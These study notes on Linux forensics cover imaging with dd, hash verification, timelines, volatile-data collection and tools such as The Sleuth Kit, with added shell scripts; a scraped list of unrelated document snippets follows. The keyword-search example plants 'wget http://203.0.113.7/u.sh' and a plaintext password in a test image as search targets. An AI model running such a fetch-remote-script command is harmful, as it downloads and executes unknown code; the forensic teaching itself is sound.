Computer Forensics: Investigating File and Operating Systems, Wireless Networks, and Storage, 2nd Edition. Chapter 6 Linux Forensics
Objectives
After completing this chapter, you should be able to:
- Create a Linux forensic environment
- Analyze floppy disks
- Analyze hard disks
- Perform data collection using the toolkit
- Understand crash commands
- Take a step-by-step approach to a case
- Use Linux in forensics
- Describe Linux forensic tools

Introduction to Linux Forensics
This chapter will explain:
- How to perform forensics with a Linux system as a target
- Why it can be beneficial to use a Linux system in other investigations

Linux
Types of Linux distributions:
- Desktop distributions
- Server or enterprise distributions
- Live-CD distributions
Linux boot sequence:
- Loading the kernel: a soft link to the current kernel image is available in the /boot directory and is referenced by the Linux Loader (LILO)
- Initialization: the file that controls initialization is /etc/inittab

File System in Linux
Most Linux distributions share a basic directory structure, with files organized in directories:
- /bin: common commands
- /boot: files needed at boot time
- /usr: local software, libraries, etc.
- /var: logs and other variable files
- /dev: interface files that allow the kernel to interact with hardware and the file system
- /home: directories for each user on the system
- /mnt: mount points for external, remote, and removable file systems
- /etc: administrative configuration files and scripts
- /root: root user's home directory
- /sbin: administrative commands
- /lib: basic system libraries
- /opt: optional and third-party software
Linux uses a tree, or hierarchical, structure for storing files and directories.
Figure 6-1 A typical Linux file structure

Linux Forensics
Utilities for imaging and basic disk analysis include: dd, sfdisk, fdisk, grep, md5sum, sha1sum, file, xxd, ghex, and khexedit
Linux is often used in computer forensics for the following reasons:
- Greater control
- Flexibility
- Power
Advantages of Linux in forensics:
- Software availability and accessibility
- Efficiency
- Optimization and customization
- Support
Disadvantages of Linux in forensics:
- The investigator may need to be specially trained to use Linux
- Because Linux is an open-source operating system, it is frequently updated

Precautions During Investigation
During an investigation, an investigator has to be sure to follow these precautions:
- Avoid running programs on a compromised system
- Do not run programs that will modify the metadata of files and directories
- Write the results of the investigation to a remote location
- Calculate hash values of the data so that any alteration can be detected

Recognizing Partitions in Linux
- File systems must be mounted before being used
- Any file systems on partitions defined during installation are mounted with each boot
- Data can be written to devices even when those devices are not mounted
- A standard IDE disk connected to the primary IDE controller as the master is referred to as hda; if the disk is connected to the primary IDE controller as a slave device, it is referred to as hdb
- Each partition is identified by its Linux name

mount Command
- Mounting: attaching a device to an existing directory on the system before it is accessed
- Mount point: the directory where the device is attached
- A device must be unmounted before it is removed
- The mount and umount commands:
  - Mounting: mount /dev/fd0 /mnt/floppy
  - Unmounting: umount /dev/fd0

dd Command Options
- The dd command is used to convert and copy a file
- It reads the [InFile] parameter, converts it to the specified format, and copies the data into the [OutFile] parameter

Floppy Disk Analysis
Steps:
1. Insert the floppy disk into the drive and obtain its SHA-1 hash
2. Create an image of the floppy's contents
3. Identify the file system
4. Mount the image for analysis
5. Obtain a SHA-1 hash of the contents
6. View the file contents
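The floppy procedure above (hash the source, image it with dd, hash the image, identify the file system, mount the image), carried through as an added shell example that is not code from the textbook. It assumes GNU coreutils (dd, sha1sum), the optional file(1) utility and, for the mount step only, root privileges and loop-device support. The device path and mount point are placeholders, and the built-in demo uses a constructed file of random bytes in place of a real floppy so it runs without hardware.

```shell
#!/bin/sh
# Added example: forensically sound acquisition of a small device with hash
# verification before and after imaging. Paths such as /dev/fd0 and the mount
# point are placeholders; the demo below constructs its own "device" file.
set -u

# SHA-1 of a file or block device, digest only.
sha1_of() {
    sha1sum "$1" | cut -d' ' -f1
}

# Image SOURCE to IMAGE with dd. conv=noerror,sync keeps reading past bad
# sectors and zero-pads them so offsets in the image still match the device.
# Succeeds only if the pre-imaging source hash equals the image hash.
acquire_image() {
    src=$1; img=$2; log=$3
    before=$(sha1_of "$src")
    dd if="$src" of="$img" bs=512 conv=noerror,sync 2>>"$log" || return 1
    after=$(sha1_of "$img")
    printf 'source sha1: %s\nimage  sha1: %s\n' "$before" "$after" >>"$log"
    [ "$before" = "$after" ]
}

# Recompute an image's hash and compare it with the recorded digest.
verify_image() {
    img=$1; expected=$2
    [ "$(sha1_of "$img")" = "$expected" ] && echo ok || echo MISMATCH
}

# Identify the file system inside the image (file -s reads block/special data).
identify_fs() {
    if command -v file >/dev/null 2>&1; then
        file -s "$1"
    else
        echo "file(1) not available"
    fi
}

# Mount the image read-only on a loop device and list everything, dotfiles included.
# noexec,nodev,noatime: nothing from the evidence runs, and access times stay untouched.
mount_ro() {
    img=$1; mnt=$2
    mkdir -p "$mnt"
    mount -o ro,loop,noexec,nodev,noatime "$img" "$mnt" && ls -laR "$mnt"
}

# Stand-alone demonstration on a constructed 32 KiB "device" (no root needed).
demo() {
    work=$(mktemp -d)
    dd if=/dev/urandom of="$work/dev" bs=512 count=64 2>/dev/null
    acquire_image "$work/dev" "$work/dev.img" "$work/acquire.log" && echo "image verified"
    verify_image "$work/dev.img" "$(sha1_of "$work/dev")"
    identify_fs "$work/dev.img"
    cat "$work/acquire.log"
    rm -rf "$work"
}

if [ "${1:-}" = "demo" ]; then demo; fi
```

Run it as `sh acquire.sh demo` for the self-contained walk-through; on a real floppy replace the constructed file with `/dev/fd0` and follow `acquire_image` with `mount_ro "$img" /mnt/evidence` as root. Hashing the source both before imaging and (via the image) after it is what lets the examiner show the copy is bit-for-bit identical.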
Hard Disk Analysis
Steps:
1. Make an image of the hard disk using dd
2. Use md5sum to collect information about the system time and date
3. Mount the copy of the evidence into the file system
4. Capture the drive's forensic data
5. Extract deleted inode (modification/access/change) times
6. Combine evidence for timeline conversion
7. Generate the timeline
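Steps 5 to 7 above (collect modification/access/change times, then turn them into a timeline) as an added shell example; it is not from the textbook and is a plain-tools approximation of what The Sleuth Kit's fls and mactime produce. It assumes GNU findutils and coreutils (find -printf, date -d) and takes the root of a read-only mounted evidence copy as its argument; the test data is constructed.

```shell
#!/bin/sh
# Added example: a MAC-time timeline from a mounted evidence tree using only
# find(1), sort(1), awk(1) and date(1). Assumes GNU find/date. The argument is
# the mount point of the read-only evidence copy (a placeholder such as /mnt/evidence).
set -u

# One record per file per timestamp kind, epoch seconds first so sort can order them:
#   <epoch> <m|a|c> <size> <path>
# %T@ = modification, %A@ = last access, %C@ = inode change (GNU find).
mac_records() {
    root=$1
    find "$root" -type f -printf '%T@ m %s %p\n' -printf '%A@ a %s %p\n' -printf '%C@ c %s %p\n'
}

# Human-readable timeline, oldest first, in UTC (the chapter's convention for times).
timeline() {
    root=$1
    mac_records "$root" | sort -n | while read -r epoch kind size path; do
        stamp=$(date -u -d "@${epoch%.*}" '+%Y-%m-%d %H:%M:%S')
        printf '%s UTC  %s  %8s  %s\n' "$stamp" "$kind" "$size" "$path"
    done
}

# Number of files modified inside an epoch window, the usual
# "what changed around the incident" question.
modified_between() {
    root=$1; from=$2; to=$3
    mac_records "$root" | awk -v f="$from" -v t="$to" '$2=="m" && $1>=f && $1<=t' | wc -l | tr -d ' '
}

if [ "${1:-}" != "" ]; then timeline "$1"; fi
```

Because the tree must be mounted with noatime (or the image accessed through fls on the raw image), the access times in the output are the suspect's, not the examiner's; ctime cannot be set by touch or utime, which is why the chapter treats inode change times as the harder-to-forge column.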
Data Collection
Forensic toolkit preparation:
- Forensic investigators use their own forensic toolkit to find and collect any important data from a compromised system
- The toolkit is a pack of tools such as nc, dd, date, cat, pcat, Hunter.o, insmod, netstat, arp, route, dmesg, and others
- The investigator mounts the toolkit on a removable disk
- It is safest to use the toolkit from a remote system in order to avoid changing the compromised system's metadata

Data Collection Using the Toolkit
Steps to collect data:
1. Media mounting: mount the toolkit on the external media
2. Calculate the hash value of the collected file
3. Collect the current date, presented in UTC format
4. Cache tables: collect the MAC address cache table and the kernel route cache table
5. Collect information about current connections and open TCP/UDP ports
6. Acquire a physical memory image
7. List modules loaded into kernel memory: check which modules are currently loaded in memory, and analyze the ksyms file to detect the presence of an intruder
8. Collect information about all processes, open ports, and files with the lsof command
9. Collect suspicious processes
10. Collect information about the compromised system
11. Gather information about the current time
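The collection steps above as an added shell script (not the textbook's toolkit): it records the UTC time first and last, then walks the volatile data in the chapter's order (ARP cache, route cache, connections, kernel modules, lsof, processes, system information), writing each result to an evidence directory and hashing it as it is written so the set can be re-verified later. It assumes the toolkit binaries are mounted at a placeholder path `$TOOLKIT` and that the evidence directory is on external media; tools that are not present on the system are noted and skipped rather than guessed at. The memory image step is omitted since it depends on the acquisition tool in use.

```shell
#!/bin/sh
# Added example: volatile-data collection in order of volatility, with a hash
# manifest. $TOOLKIT is a placeholder for the mounted, trusted toolkit directory.
set -u
TOOLKIT=${TOOLKIT:-/mnt/toolkit/bin}

# Run one collection command, save its output and record a SHA-1 in the manifest.
# $1 = label for the output file, remaining args = command line.
collect() {
    label=$1; shift
    out="$EVIDENCE/$label.txt"
    if command -v "$1" >/dev/null 2>&1; then
        "$@" >"$out" 2>&1 || echo "command exited with status $?" >>"$out"
    else
        echo "tool not available: $1" >"$out"
    fi
    sha1sum "$out" >>"$EVIDENCE/manifest.sha1"
}

# Collect into the given directory; prints the number of artifacts recorded.
collect_volatile() {
    EVIDENCE=$1
    mkdir -p "$EVIDENCE"
    PATH="$TOOLKIT:$PATH"; export PATH   # prefer the toolkit's binaries over the suspect system's
    collect 00_date_start  date -u
    collect 01_arp_cache   arp -an
    collect 02_route_cache route -n
    collect 03_connections netstat -anp
    collect 04_modules     lsmod
    collect 05_lsof        lsof -n -P
    collect 06_processes   ps auxww
    collect 07_system      uname -a
    collect 99_date_end    date -u
    wc -l < "$EVIDENCE/manifest.sha1" | tr -d ' '
}

# Later, prove the collected files are unchanged by re-checking the manifest.
verify_manifest() {
    sha1sum --quiet -c "$1/manifest.sha1" >/dev/null 2>&1 && echo ok || echo MISMATCH
}

if [ "${1:-}" != "" ]; then collect_volatile "$1"; fi
```

To follow the chapter's advice of writing results to a remote system instead of local media, each `collect` output can be piped through `nc` to a listener on the examiner's machine; the manifest should then be produced on the receiving side.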
Table 6-1 An investigator can use these commands to collect information

Keyword Searching
To search for signs of an intrusion, an investigator can use tools such as the following:
- strings: gathers all printable character sequences from image files; use the -t switch to add each string's offset from the beginning of the file
- grep: searches for commands typed by an intruder, IP addresses, passwords, or even decrypted parts of malicious code
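The strings/grep technique above as an added shell example, not code from the textbook. `strings -t d` prefixes each string with its decimal byte offset in the image, which is what lets a hit be located again with dd or a hex viewer; where strings(1) is not installed the same offsets come from GNU grep's -o/-b options (an assumption about the examiner's system). The image is constructed inline with two planted fragments at known offsets, and the address is from the TEST-NET-3 documentation range.

```shell
#!/bin/sh
# Added example: keyword search over a raw image with byte offsets.
# Assumes GNU strings (binutils) or, as fallback, GNU grep.
set -u
export LC_ALL=C   # byte-wise matching; keeps [[:print:]] to ASCII

# "<offset> <string>" for every printable run of 4 or more bytes in the image.
printable_strings() {
    if command -v strings >/dev/null 2>&1; then
        strings -a -t d "$1" | sed 's/^ *//'
    else
        grep -a -o -b -E '[[:print:]]{4,}' "$1" | sed 's/:/ /'
    fi
}

# Case-insensitive search for any of the given keywords. $1 = image, rest = keywords.
keyword_hits() {
    img=$1; shift
    pattern=$(printf '%s|' "$@"); pattern=${pattern%|}
    printable_strings "$img" | grep -E -i -- "$pattern"
}

# Byte offset of the first hit for one keyword (empty if none).
first_offset() {
    keyword_hits "$1" "$2" | head -n 1 | cut -d' ' -f1
}

# Distinct IPv4-looking strings, a common first pass for connection evidence.
ipv4_count() {
    printable_strings "$1" | grep -E -o '([0-9]{1,3}\.){3}[0-9]{1,3}' | sort -u | wc -l | tr -d ' '
}

# Read LEN bytes at OFFSET to examine a hit in context (dd skip= uses the same offset).
extract_at() {
    dd if="$1" bs=1 skip="$2" count="$3" 2>/dev/null
}

# Constructed image: zero-filled gaps with two planted fragments at known offsets.
make_sample_image() {
    {
        head -c 1024 /dev/zero
        printf 'wget http://203.0.113.7/u.sh\n'   # 29 bytes, starts at offset 1024
        head -c 512 /dev/zero
        printf 'PASSWORD=hunter2\n'               # starts at offset 1565
        head -c 256 /dev/zero
    } > "$1"
}

if [ "${1:-}" != "" ]; then shift_img=$1; shift; keyword_hits "$shift_img" "$@"; fi
```

Typical use is `sh search.sh disk.img wget password 203.0.113`; because the offsets are absolute positions in the image, a hit in unallocated space can be tied back to a data unit with the Sleuth Kit's dcalc and from there to an inode with ifind.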
Linux Crash Utility: Commands
Table 6-2 An investigator can use these crash commands to extract system information

Investigation Examples
Investigation Example I: Floppy Disk Forensics
- Rebecca had filed a lawsuit against Good Company, Inc., for sexual harassment by one of its senior directors, Mr. Peter Samson
- She claims that Mr. Samson used to send her explicit material through floppy disks marked as legitimate work, and she has submitted a floppy as evidence
- An investigator has been called to investigate the case on behalf of Good Company, Inc.
Step-by-step approach:
1. All processes must be documented
2. The disk structure should be determined
3. Once a separate mount point has been created, the investigator can proceed to mount the restored, imaged working copy and analyze the contents
4. The integrity of the image file should be checked to be sure it is the same as the original
5. The investigator can then list all files and directories in the image, including hidden files
6. Handling date, file access, and alteration times should be noted
7. The investigator can now search for likely evidence using grep
8. To identify unknown file extensions and changed file appearances, the investigator can issue the command file [changedfile]
9. Apart from searching suspect files, certain keywords can be searched for across the entire file list

Challenges in disk forensics with Linux:
- Linux cannot identify the last sector on hard drives with an odd number of sectors
- Most Linux tools are used at the command line and are more complicated than Windows or Mac tools
- Devices can be written to even if they are not mounted
- Bugs in open-source tools can be used to question the credibility of the tools for forensic use
- Original work, including the evidence, can be destroyed with a command-line typo, particularly when imaging

Investigation Example II: Hard Drive Forensics
- Mr. Jason Smith has been accused of storing illegal material on his company's system
- An investigator has been called upon to examine the hard disk in question
- How should the investigator proceed in extracting and preserving the evidence?
Step-by-step approach:
1. All processes must be documented
2. The investigator may then proceed to prepare an image of the hard disk
3. Partition the newly formatted disk and reboot
4. The disk should then be formatted with the ext3 file system
5. The investigator then prepares the disk for imaging
6. Image the disk
7. Check for accuracy using md5sum
8. Mount the disk and extract the evidence

Linux Forensic Tools
The Sleuth Kit:
- A collection of UNIX-based command-line file and volume system forensic analysis tools
- Supports DOS partitions, BSD partitions (disk labels), Mac partitions, Sun slices (Volume Table of Contents), and GPT disks
- Analyzes raw (dd), Expert Witness (EnCase), and AFF file systems and disk images, supporting the NTFS, FAT, UFS 1, UFS 2, ext2, ext3, and ISO 9660 file systems
Tools in The Sleuth Kit:
- File system layer tool: fsstat
- Filename layer tools: ffind and fls
- Metadata layer tools: icat, ifind, ils, and istat
- Data-unit layer tools: dcat, dls, dstat, and dcalc
- File system journal tools: jcat and jls
- Media management tool: mmls
- Image file tools: img_stat and img_cat
- Disk tools: disk_sreset and disk_stat
- Other tools: hfind, mactime, sorter, and sigfind

Autopsy
Autopsy Forensic Browser:
- Graphical interface to The Sleuth Kit
- Since Autopsy is HTML-based, the Autopsy server can be reached from any platform using an HTML browser
- Provides a File Manager-like interface and shows details about deleted data and file system structures
- Analysis modes: dead analysis and live analysis
Evidence search techniques:
- File listing, file content, hash databases
- File type sorting
- Timeline of file activity
- Keyword search
- Metadata analysis
- Data-unit analysis
- Image details

SMART for Linux
Figure 6-2 SMART supports plug-ins for multiple uses

Penguin Sleuth Kit
- Bootable Linux distribution based on Knoppix
- Collects several tools including The Coroner's Toolkit (TCT), Autopsy, and The Sleuth Kit, as well as penetration-testing and virus-scanning tools
- Offers both a GUI environment and a command-line interface

The Farmer's Boot CD
Farmer's Boot CD (FBCD) can safely and quickly preview systems (hard drives, thumb drives, digital music devices such as iPods, digital camera media, and more) directly from Linux.
Features include the following:
- Boot almost any x86 system
- Mount file systems in a forensically sound manner
- Preview data using a single, unified graphical user interface (GUI)
- Acquire media after it is previewed
Some advantages:
- Allows attaching digital cameras, previewing contents of onboard memory, and dumping software information and graphics or video files
- Authenticates and acquires file systems or devices in simple point-and-click GUIs
- Generates a catalog of all hardware attached to the system
- Dumps BIOS information of the system
- Easily obtains both hard drive and file system information

Delve
Figure 6-3 Delve's Devices tab mounts systems in a read-only manner. Right-click on any file system to view its available options

Maresware
- Provides tools for investigating computer records on an Intel-based Linux machine
- Includes the following major programs: Bates_no, Catalog, Hash, Hashcmp, Md5, Strsrch, U_to_A

Captain Nemo
Figure 6-4 Captain Nemo will mount Linux drives in Windows

The Coroner's Toolkit (TCT)
A collection containing the following programs:
- Grave-robber
- ils and mactime tools
- unrm and lazarus tools
- findkey tool

FLAG
FLAG (Forensic Log Analysis GUI):
- Used for log file analysis and forensic investigations
- Uses a database as a back end to assist in managing large volumes of data
- FLAG features: log analysis, network forensics, disk forensics

md5deep
- Cross-platform set of programs used to compute MD5, SHA-1, SHA-256, Tiger, or Whirlpool message digests on an arbitrary number of files
- Features include recursive operation, comparison mode, and time estimation

TestDisk
TestDisk helps recover lost partitions and make non-booting disks bootable again. It can perform the following functions:
- Fix the partition table to recover deleted partitions
- Recover a FAT32 boot sector from its backup
- Rebuild a FAT12/FAT16/FAT32 boot sector
- Fix FAT tables
- Rebuild an NTFS boot sector
- Recover an NTFS boot sector from its backup
- Copy files from deleted FAT, NTFS, and ext2/ext3 partitions

HELIX
- An incident response and computer forensic toolkit formerly based on the Knoppix Live CD
- No longer available as free forensic software
- The latest version, Helix3 Pro, is only available to e-fense members through a paid subscription
- Booting into HELIX provides a graphical menu for accessing forensic tools

BackTrack
- BackTrack can be used as a bootable CD or bootable USB flash drive
- Also available as a VM appliance for use in a virtual environment
- Provides over 300 tools, such as: penetration testing tools, wireless cracking tools, network mapping tools, information gathering tools, vulnerability identification tools, and forensic and reverse engineering tools

Kali Linux
Kali Linux is an updated version of BackTrack
Figure 6-5 Kali Linux

Summary
- Linux imparts more flexibility, power, and control as a forensic tool than other operating systems
- Linux has a number of simple utilities that make imaging and basic analysis of suspect disks possible
- There are several popular Linux toolkits that provide a GUI
More informationInvestigations and Incident Response Using BackTrack
Investigations and Incident Response Using BackTrack HTCIA New England Chapter General Meeting September 22, 2009 Ming Chow Tufts University mchow@cs.tufts.edu http://www.cs.tufts.edu/~mchow 1 Introduction
More informationChapter 12 File-System Implementation
Chapter 12 File-System Implementation 1 Outline File-System Structure File-System Implementation Directory Implementation Allocation Methods Free-Space Management Efficiency and Performance Recovery Log-Structured
More informationDESIGN AND IMPLEMENTATION OF A NETWORK FORENSICS SYSTEM FOR LINUX
DESIGN AND IMPLEMENTATION OF A NETWORK FORENSICS SYSTEM FOR LINUX Hong-Ming Wang National Kaohsiung Normal University Kaohsiung, Taiwan alexwang24@gmail.com Chung-Huang Yang National Kaohsiung Normal University
More informationThis is Worksheet and Assignment 12. Disks, Partitions, and File Systems
This is Worksheet and Assignment 12 This is a combined Worksheet and Assignment.. Quizzes and tests may refer to work done in this Worksheet and Assignment; save your answers. You will use a checking program
More informationIntroduction to Volume Analysis, Part I: Foundations, The Sleuth Kit and Autopsy. Digital Forensics Course* Leonardo A. Martucci *based on the book:
Part I: Foundations, Introduction to Volume Analysis, The Sleuth Kit and Autopsy Course* Leonardo A. Martucci *based on the book: File System Forensic Analysis by Brian Carrier LAM 2007 1/12h Outline Part
More informationFrom TCT to the Adaptability of Computer Forensic Tools
From TCT to the Adaptability of Computer Forensic Tools Haohao Zhai Wenchang Shi Bin Liang Liang Wan School of Information,Renmin University of China,Beijing 100872,China Key Lab of Data Engineering and
More informationAcknowledgments About the Authors
Preface p. xv Acknowledgments p. xix About the Authors p. xxi Case Studies p. xxv Live Incident Response p. 1 Windows Live Response p. 3 Analyzing Volatile Data p. 5 The System Date and Time p. 6 Current
More informationLab E2: bypassing authentication and resetting passwords
Lab E2: bypassing authentication and resetting passwords TTM4175 September 7, 2015 The purpose of this lab is to learn about techniques for bypassing the authentication and access control of Windows and
More informationChapter 11: Implementing File Systems
Silberschatz 1 Chapter 11: Implementing File Systems Thursday, November 08, 2007 9:55 PM File system = a system stores files on secondary storage. A disk may have more than one file system. Disk are divided
More informationCS370 Operating Systems
CS370 Operating Systems Colorado State University Yashwant K Malaiya Fall 2017 Lecture 24 File Systems Slides based on Text by Silberschatz, Galvin, Gagne Various sources 1 1 Questions from last time How
More informationInstalling caos with Cinch on Floppy Disk
Installing caos with Cinch on Floppy Disk Troy Andrew Johnson May 21, 2004 Abstract cinch is the caos Linux (http://www.caosity.org/) installer. Prerequisites What you need: two floppy disks (at least)
More informationChapter 12: File System Implementation. Operating System Concepts 9 th Edition
Chapter 12: File System Implementation Silberschatz, Galvin and Gagne 2013 Chapter 12: File System Implementation File-System Structure File-System Implementation Directory Implementation Allocation Methods
More informationGuide to Computer Forensics and Investigations Fourth Edition. Chapter 2 Understanding Computer Investigations
Guide to Computer Forensics and Investigations Fourth Edition Chapter 2 Understanding Computer Investigations Objectives Explain how to prepare a computer investigation Apply a systematic approach to an
More informationChapter 12: File System Implementation
Chapter 12: File System Implementation Silberschatz, Galvin and Gagne 2013 Chapter 12: File System Implementation File-System Structure File-System Implementation Directory Implementation Allocation Methods
More informationChapter 5 Live Data Collection Windows Systems
Chapter 5 Live Data Collection Windows Systems Ed Crowley Spring 10 1 Topics Live Investigation Goals Creating a Response Toolkit Common Tools and Toolkits Preparing the Toolkit Storing Information Obtained
More informationPL-I Assignment Broup B-Ass 5 BIOS & UEFI
PL-I Assignment Broup B-Ass 5 BIOS & UEFI Vocabulary BIOS = Basic Input Output System UEFI = Unified Extensible Firmware Interface POST= Power On Self Test BR = Boot Record (aka MBR) BC =Boot Code (aka
More informationLinux Manually Mounting External Hard Drive Mac Terminal
Linux Manually Mounting External Hard Drive Mac Terminal After the cd /Volumes command when I type ls it shows me my hard drive name twice, with Filesystem Size Used Avail Capacity iused ifree %iused Mounted
More informationTanium Incident Response User Guide
Tanium Incident Response User Guide Version 4.4.3 September 06, 2018 The information in this document is subject to change without notice. Further, the information provided in this document is provided
More informationGuide to Computer Forensics. Third Edition. Chapter 11 Chapter 11 Network Forensics
Guide to Computer Forensics and Investigations Third Edition Chapter 11 Chapter 11 Network Forensics Objectives Describe the importance of network forensics Explain standard procedures for performing a
More informationFile System Internals. Jin-Soo Kim Computer Systems Laboratory Sungkyunkwan University
File System Internals Jin-Soo Kim (jinsookim@skku.edu) Computer Systems Laboratory Sungkyunkwan University http://csl.skku.edu Today s Topics File system implementation File descriptor table, File table
More informationAccessData Advanced Forensics
This advanced five-day course provides the knowledge and skills necessary to install, configure and effectively use Forensic Toolkit (FTK ), FTK Imager Password Recovery Toolkit (PRTK ) and Registry Viewer.
More informationRicardo Rocha. Department of Computer Science Faculty of Sciences University of Porto
Ricardo Rocha Department of Computer Science Faculty of Sciences University of Porto Slides based on the book Operating System Concepts, 9th Edition, Abraham Silberschatz, Peter B. Galvin and Greg Gagne,
More informationChapter 12: File System Implementation
Chapter 12: File System Implementation Silberschatz, Galvin and Gagne 2013 Chapter 12: File System Implementation File-System Structure File-System Implementation Allocation Methods Free-Space Management
More informationFile Systems Management and Examples
File Systems Management and Examples Today! Efficiency, performance, recovery! Examples Next! Distributed systems Disk space management! Once decided to store a file as sequence of blocks What s the size
More informationACRONIS TRUE IMAGE 11 HOME REVIEWER S GUIDE
ACRONIS TRUE IMAGE 11 HOME REVIEWER S GUIDE Acronis True Image 11.0 Home provides the maximum flexibility to ensure you are adequately protected and can recover from unforeseen events such as viruses,
More informationVendor: CompTIA. Exam Code: Exam Name: CompTIA A+ Certification Exam (902) Version: Demo
Vendor: CompTIA Exam Code: 220-902 Exam Name: CompTIA A+ Certification Exam (902) Version: Demo DEMO QUESTION 1 Which of the following best practices is used to fix a zero-day vulnerability on Linux? A.
More informationAdvanced Operating Systems
Advanced Operating Systems File Systems: File Allocation Table, Linux File System, NTFS Lecture 10 Case Studies of File Systems File Allocation Table (FAT) Unix File System Berkeley Fast File System Linux
More informationCS307: Operating Systems
CS307: Operating Systems Chentao Wu 吴晨涛 Associate Professor Dept. of Computer Science and Engineering Shanghai Jiao Tong University SEIEE Building 3-513 wuct@cs.sjtu.edu.cn Download Lectures ftp://public.sjtu.edu.cn
More informationIntroduction to Computer Forensics
Introduction to Computer Forensics Subrahmani Babu Scientist- C, Computer Forensic Laboratory Indian Computer Emergency Response Team (CERT-In) Department of Information Technology, Govt of India. babu_sivakami@cert-in.org.in
More information